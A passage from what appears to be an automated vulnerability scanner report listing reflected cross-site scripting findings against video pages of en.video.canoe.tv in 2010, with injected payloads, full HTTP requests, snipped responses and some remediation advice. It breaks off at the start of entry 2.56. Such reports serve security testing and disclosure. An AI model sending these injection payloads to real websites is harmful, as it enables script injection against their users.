2.45. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-answer-ever/62560578001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/dumbest-answer-ever/62560578001

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8db21<img%20src%3da%20onerror%3dalert(1)>812e35b90d5 was submitted in the REST URL parameter 2. This input was echoed as 8db21<img src=a onerror=alert(1)>812e35b90d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/8db21<img%20src%3da%20onerror%3dalert(1)>812e35b90d5/tv-bloopers/88729112001/dumbest-answer-ever/62560578001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:47 GMT
Server: Apache
Set-Cookie: PHPSESSID=c9c0f66b8d6adc654a78b2c15d8f84f8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c9c0f66b8d6adc654a78b2c15d8f84f8; path=/; httponly
Set-Cookie: c9c0f66b8d6adc654a78b2c15d8f84f8=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A19%3A%22dumbest-answer-ever%22%3Bs%3A8%3A%22video_id%22%3Bi%3A62560578001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2262560578001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-02
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<img src=a onerror=alert(1)>812e35b90d5" id="crumb_section">8db21<img src=a onerror=alert(1)>812e35b90d5</a>
...[SNIP]...

2.46. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-answer-ever/62560578001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/dumbest-answer-ever/62560578001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4632"><img%20src%3da%20onerror%3dalert(1)>bbd59bea85 was submitted in the REST URL parameter 2. This input was echoed as b4632"><img src=a onerror=alert(1)>bbd59bea85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/b4632"><img%20src%3da%20onerror%3dalert(1)>bbd59bea85/tv-bloopers/88729112001/dumbest-answer-ever/62560578001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:32 GMT
Server: Apache
Set-Cookie: PHPSESSID=4a0dc6d29d163ee558b5db19778e36b8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=4a0dc6d29d163ee558b5db19778e36b8; path=/; httponly
Set-Cookie: 4a0dc6d29d163ee558b5db19778e36b8=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A19%3A%22dumbest-answer-ever%22%3Bs%3A8%3A%22video_id%22%3Bi%3A62560578001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2262560578001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-02
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/b4632gtltimg-srca-onerroralert1gtbbd59bea85/tv-bloopers/88729112001" title="B4632"><img src=a onerror=alert(1)>bbd59bea85" id="crumb_section">
...[SNIP]...

2.47. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-answer-ever/62560578001 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/dumbest-answer-ever/62560578001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f080"><img%20src%3da%20onerror%3dalert(1)>27a1791476c was submitted in the REST URL parameter 3. This input was echoed as 8f080"><img src=a onerror=alert(1)>27a1791476c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy/tv-bloopers8f080"><img%20src%3da%20onerror%3dalert(1)>27a1791476c/88729112001/dumbest-answer-ever/62560578001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:53 GMT
Server: Apache
Set-Cookie: PHPSESSID=016e0808ad91319e9a45477d4564d75a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=016e0808ad91319e9a45477d4564d75a; path=/; httponly
Set-Cookie: 016e0808ad91319e9a45477d4564d75a=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A19%3A%22dumbest-answer-ever%22%3Bs%3A8%3A%22video_id%22%3Bi%3A62560578001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2262560578001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy/tv-bloopers8f080"><img src=a onerror=alert(1)>27a1791476c/88729112001/page/2">
...[SNIP]...

2.48. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb6a0\'%3bf7d2af5485d was submitted in the REST URL parameter 2. This input was echoed as fb6a0\\';f7d2af5485d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /video/comedyfb6a0\'%3bf7d2af5485d/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:05 GMT
Server: Apache
Set-Cookie: PHPSESSID=b218f6d276f09999902788738b175c91; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b218f6d276f09999902788738b175c91; path=/; httponly
Set-Cookie: b218f6d276f09999902788738b175c91=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A23%3A%22dumbest-contestant-ever%22%3Bs%3A8%3A%22video_id%22%3Bi%3A33823613001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2233823613001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<![CDATA[

function OmnitureVariables(){
   this.mainsection = 'video';
   this.sectionLevel2 = 'Comedyfb6a0\\';f7d2af5485d'; // modified by VIDEO APP
   this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP
   this.sectionLevel4 = 'Dumbest contestant ever'; // modified by VIDEO APP
   this.sectionLevel5 = '';
   this.secti
...[SNIP]...

2.49. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9191"><img%20src%3da%20onerror%3dalert(1)>c4c9deedb7 was submitted in the REST URL parameter 2. This input was echoed as f9191"><img src=a onerror=alert(1)>c4c9deedb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedyf9191"><img%20src%3da%20onerror%3dalert(1)>c4c9deedb7/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:02 GMT
Server: Apache
Set-Cookie: PHPSESSID=758d8b25ca34d74511a5f33f34e9839f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=758d8b25ca34d74511a5f33f34e9839f; path=/; httponly
Set-Cookie: 758d8b25ca34d74511a5f33f34e9839f=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A23%3A%22dumbest-contestant-ever%22%3Bs%3A8%3A%22video_id%22%3Bi%3A33823613001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2233823613001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedyf9191gtltimg-srca-onerroralert1gtc4c9deedb7/tv-bloopers/88729112001" title="Comedyf9191"><img src=a onerror=alert(1)>c4c9deedb7" id="crumb_section">
...[SNIP]...

2.50. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6ce36<x%20style%3dx%3aexpression(alert(1))>c9ae79b4c97 was submitted in the REST URL parameter 2. This input was echoed as 6ce36<x style=x:expression(alert(1))>c9ae79b4c97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /video/comedy6ce36<x%20style%3dx%3aexpression(alert(1))>c9ae79b4c97/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:40 GMT
Server: Apache
Set-Cookie: PHPSESSID=ebd2aaca917181924eafbdca5f272b7e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ebd2aaca917181924eafbdca5f272b7e; path=/; httponly
Set-Cookie: ebd2aaca917181924eafbdca5f272b7e=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A23%3A%22dumbest-contestant-ever%22%3Bs%3A8%3A%22video_id%22%3Bi%3A33823613001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2233823613001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<x style=x:expression(alert(1))>c9ae79b4c97" id="crumb_section">Comedy6ce36<x style=x:expression(alert(1))>c9ae79b4c97</a>
...[SNIP]...

2.51. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 402b9"><img%20src%3da%20onerror%3dalert(1)>1ddcf2021e was submitted in the REST URL parameter 3. This input was echoed as 402b9"><img src=a onerror=alert(1)>1ddcf2021e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy/tv-bloopers402b9"><img%20src%3da%20onerror%3dalert(1)>1ddcf2021e/88729112001/dumbest-contestant-ever/33823613001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:44 GMT
Server: Apache
Set-Cookie: PHPSESSID=ad4f3ee9c8792913c0c9e948aed42963; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ad4f3ee9c8792913c0c9e948aed42963; path=/; httponly
Set-Cookie: ad4f3ee9c8792913c0c9e948aed42963=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A23%3A%22dumbest-contestant-ever%22%3Bs%3A8%3A%22video_id%22%3Bi%3A33823613001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2233823613001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-02
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy/tv-bloopers402b9"><img src=a onerror=alert(1)>1ddcf2021e/88729112001/page/2">
...[SNIP]...

2.52. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9590c<img%20src%3da%20onerror%3dalert(1)>d72c5d4840 was submitted in the REST URL parameter 2. This input was echoed as 9590c<img src=a onerror=alert(1)>d72c5d4840 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy9590c<img%20src%3da%20onerror%3dalert(1)>d72c5d4840/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:14 GMT
Server: Apache
Set-Cookie: PHPSESSID=659160491c80c11a61ad3facbd8ab45a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=659160491c80c11a61ad3facbd8ab45a; path=/; httponly
Set-Cookie: 659160491c80c11a61ad3facbd8ab45a=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A36%3A%22excited-contestant-crashes-off-stage%22%3Bs%3A8%3A%22video_id%22%3Bi%3A16639515001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2216639515001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<img src=a onerror=alert(1)>d72c5d4840" id="crumb_section">Comedy9590c<img src=a onerror=alert(1)>d72c5d4840</a>
...[SNIP]...

2.53. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66b1a\'%3b7086606ef59 was submitted in the REST URL parameter 2. This input was echoed as 66b1a\\';7086606ef59 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /video/comedy66b1a\'%3b7086606ef59/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:05 GMT
Server: Apache
Set-Cookie: PHPSESSID=5e42a26429efae733bbf69f24e0a7e6d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=5e42a26429efae733bbf69f24e0a7e6d; path=/; httponly
Set-Cookie: 5e42a26429efae733bbf69f24e0a7e6d=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A36%3A%22excited-contestant-crashes-off-stage%22%3Bs%3A8%3A%22video_id%22%3Bi%3A16639515001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2216639515001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<![CDATA[

function OmnitureVariables(){
   this.mainsection = 'video';
   this.sectionLevel2 = 'Comedy66b1a\\';7086606ef59'; // modified by VIDEO APP
   this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP
   this.sectionLevel4 = 'Excited Contestant Crashes Off Stage'; // modified by VIDEO APP
   this.sectionLevel5 = ''
...[SNIP]...

2.54. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a3cc"><img%20src%3da%20onerror%3dalert(1)>89f453c35f1 was submitted in the REST URL parameter 2. This input was echoed as 3a3cc"><img src=a onerror=alert(1)>89f453c35f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy3a3cc"><img%20src%3da%20onerror%3dalert(1)>89f453c35f1/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:02 GMT
Server: Apache
Set-Cookie: PHPSESSID=d2ef22370cdba660695949360b7ec0ea; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=d2ef22370cdba660695949360b7ec0ea; path=/; httponly
Set-Cookie: d2ef22370cdba660695949360b7ec0ea=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A36%3A%22excited-contestant-crashes-off-stage%22%3Bs%3A8%3A%22video_id%22%3Bi%3A16639515001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2216639515001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-02
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy3a3ccgtltimg-srca-onerroralert1gt89f453c35f1/tv-bloopers/88729112001" title="Comedy3a3cc"><img src=a onerror=alert(1)>89f453c35f1" id="crumb_section">
...[SNIP]...

2.55. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aff6"><img%20src%3da%20onerror%3dalert(1)>43baf1b28f1 was submitted in the REST URL parameter 3. This input was echoed as 5aff6"><img src=a onerror=alert(1)>43baf1b28f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy/tv-bloopers5aff6"><img%20src%3da%20onerror%3dalert(1)>43baf1b28f1/88729112001/excited-contestant-crashes-off-stage/16639515001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:20 GMT
Server: Apache
Set-Cookie: PHPSESSID=c77257e150232519599f6633ec01d609; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c77257e150232519599f6633ec01d609; path=/; httponly
Set-Cookie: c77257e150232519599f6633ec01d609=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A36%3A%22excited-contestant-crashes-off-stage%22%3Bs%3A8%3A%22video_id%22%3Bi%3A16639515001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2216639515001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy/tv-bloopers5aff6"><img src=a onerror=alert(1)>43baf1b28f1/88729112001/page/2">
...[SNIP]...

2.56. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001

Issue detail

